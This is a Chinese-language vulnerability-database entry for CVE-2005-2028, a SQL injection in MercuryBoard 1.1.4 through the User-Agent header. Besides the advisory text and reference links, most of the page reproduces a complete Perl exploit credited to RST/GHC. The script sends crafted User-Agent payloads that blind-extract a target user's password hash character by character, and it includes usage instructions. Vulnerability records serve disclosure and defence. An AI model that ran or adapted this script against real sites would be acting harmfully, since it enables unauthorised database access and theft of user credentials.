CVE-2005-2028
CVSS7.5
发布时间 :2005-06-21 00:00:00
修订时间 :2016-10-17 23:24:15
NMCOE    

[原文]SQL injection vulnerability in index.php for MercuryBoard 1.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the User-Agent HTTP header.


[CNNVD]MercuryBoard 'Index.PHP' 远程SQL注入漏洞(CNNVD-200506-199)

        MercuryBoard 1.1.4及早期版本的index.php存在SQL注入漏洞,远程攻击者可借助User-Agent HTTP头来执行任意SQL指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2028
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2028
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-199
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111938068428037&w=2
(UNKNOWN)  BUGTRAQ  20050621 MercuryBoard 1.1.4 SQL Injection
http://www.securityfocus.com/bid/14015
(VENDOR_ADVISORY)  BID  14015

- 漏洞信息

MercuryBoard 'Index.PHP' 远程SQL注入漏洞
高危 SQL注入
2005-06-21 00:00:00 2006-10-06 00:00:00
远程  
        MercuryBoard 1.1.4及早期版本的index.php存在SQL注入漏洞,远程攻击者可借助User-Agent HTTP头来执行任意SQL指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1058)

MercuryBoard <= 1.1.4 SQL Injection Exploit (EDBID:1058)
php webapps
2005-06-21 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl

### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### * note: you need first register on forum for get id and login
### after what logout from forum and run exploit
### * note2: edit timestamp in sources if exploit not work ;)
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf
### RST/GHC - http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;
use Getopt::Std;

getopts('h:f:b:i:l:p:');

$server    = $opt_h;
$path      = $opt_f;
$member_id = $opt_b;
$hacker_id = $opt_i;
$hacker_l  = $opt_l;
$prefix    = $opt_p || 'mb_' ;

if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~]      SERVER  : $server\r\n";
print " [~]  FORUM PATH  : $path\r\n";
print " [~] ID FOR BRUTE : $member_id\r\n";
print " [~]    HACKER ID : $hacker_id\r\n";
print " [~] HACKER LOGIN : $hacker_l\r\n";
print " [~] TABLE PREFIX : $prefix\r\n\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{\b\b DONE ] 
 
 -------------------------------------------------------------------
 USER ID : $member_id
    HASH : $allchar
 -------------------------------------------------------------------
 };
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();  
 }
else 
 {  
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0]; 
 
 $user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*";

 $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
 printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept: */*\nConnection: close\n\n",
 $request,$server,$user_agent2);
 
 while(<$sock2>) 
  {   
  #print $_;
  if (/w=$hacker_id"\>$hacker_l/) { return 1; }
  } 

 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 &head;
 print q(
 USAGE
    r57mercury.pl [OPTIONS]
  
 OPTIONS
  -h [host]     ~ host where mercury board installed
  -f [/folder/] ~ folder where mercury board installed
  -b [user_id]  ~ user id for bruteforce
  -i [id]       ~ hacker id (hacker must be register on forum)
  -l [login]    ~ hacker login on forum
  -p [prefix]   ~ database tables prefix (optional)
                  default is "mb"
 E.G.
  r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
 -------------------------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }
sub head()
 {
 print q(
 -------------------------------------------------------------------
 MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
 -------------------------------------------------------------------
 );
 }

# milw0rm.com [2005-06-21]
		

- 漏洞信息

17406
MercuryBoard index.php User-Agent HTTP Header SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-06-21 Unknow
2005-06-21 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站